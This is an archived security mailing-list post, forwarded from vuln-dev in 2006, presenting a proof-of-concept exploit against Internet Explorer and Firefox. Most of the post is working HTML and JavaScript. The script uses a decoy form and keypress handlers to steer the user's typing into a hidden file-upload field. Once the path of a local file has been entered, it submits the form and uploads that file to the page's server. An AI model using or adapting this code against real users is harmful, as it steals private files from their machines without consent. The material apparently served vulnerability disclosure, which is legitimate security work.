ðòïåëôù 

  áòèé÷ 

Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  óôáôøé 

  ðåòóïîáìøîïå 

  ðòïçòáííù 

ðéûéôå
ðéóøíá














     áòèé÷ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: InternetExplorer & Mozilla Firefox Local File Disclosure Vulnerability PoC Exploit (Reported by Symantec)

> -----Original Message-----
> From: sirdarckcat@xxxxxxxxx [mailto:sirdarckcat@xxxxxxxxx] 
> Sent: Sunday, June 11, 2006 1:38 PM
> To: vuln-dev@xxxxxxxxxxxxxxxxx
> Subject: InternetExplorer & Mozilla Firefox Local File 
> Disclosure Vulnerability PoC Exploit (Reported by Symantec)
> 
> This is a sample PoC Exploit for the Internet Explorer and 
> Mozilla Firefox security flaw explained here:
> http://www.techweb.com/showArticle.jhtml?articleID=188702202
> and reported by Symantec.
> 
> The subjects of the links sugested, are for forcing the user to input:
> FILE
> AUTOEXEC
> BAT
> 
> so we can receive:
> file://c:/autoexec.bat
> 
> and upload this file to a server.
> 
> This is a low risk vulnerability.
> 
> //--START HTML CODE--//
> <html>
> <body>
> <form method=post action="upload.php" type="multipart/form-data">
> Please sugest 3 webpages for each subject (please include 
> http:// or https://)
> <ul>
> <li>Freeware Files Download</li>
> <li>Automovilism</li>
> <li>Extreme Sports</li>
> <li>Technology</li>
> <li>Batman</li>
> </ul>
> <textarea name=other style="width:100%;height:50%"></textarea><br>
> <input type=file name=thet disabled 
> style="visibility:hidden;height:1;width:1">
> </form>
> <script>
> /**
> *  OnKeyDown - JavaScript - Local File Disclosure vuln. PoC
> *             by sirdarckcat [at] gmail [.] com
> *                   from:     elhacker.net
> **/
> var nidshift = new Array(0 ,0 ,0 ,0 ,1  ,0  ,0  ,0 ,1  ,0  ,0 
> ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0  ,0 ,0 ,0);
> var thefilek = new 
> Array(70,73,76,69,190,111,111,67,190,111,65,85,84,79,69,88,69,
> 67,190,66,65,84);
> var thefilew = "file://c:/autoexec.bat";
> var dv = 0;
> var chift = false;
> var teo = document.forms[0].thet;
> var feo = document.forms[0].other;
> 
> function checa(tecla) {
>               var rt=(tecla.which)?tecla.which:event.keyCode;
>               var lw=String.fromCharCode(rt);
>               if (dv>=thefilew.length){
>                       document.forms[0].submit();
>               }
>               if (rt == 16){
>                       chift = true;
>               }
>               if (rt==thefilek[dv]){
>                       if ((nidshift[dv] && chift) || 
> (!nidshift[dv] && !chift)){
>                               teo.disabled=false;
>                               teo.style.visibility="visible";
>                               teo.focus();
>                               feo.value += thefilew[dv];
>                               dv++;
>                       }
>               }else{
>                       feo.focus();
>                       teo.disabled=true;
>                       teo.style.visibility="hidden";
>               }
> }
> function solsh(tecla){
>       var rt=(tecla.which)?tecla.which:event.keyCode;
>       if (rt == 16){
>               chift = false;
>       }
> }
> function mprss(tecla){
>       var rt=(tecla.which)?tecla.which:event.keyCode;
>       if (rt == 16){
>               chift = true;
>       }
> }
> document.onkeydown = checa;
> document.onkeyup   = solsh;
> document.onkeypress= mprss;
> </script>
> </body>
> </html>
> //--END HTML CODE--//
> 
> Att.
> Sirdarckcat
> www.elhacker.net
>

 



Copyright © Lexa Software, 1996-2009.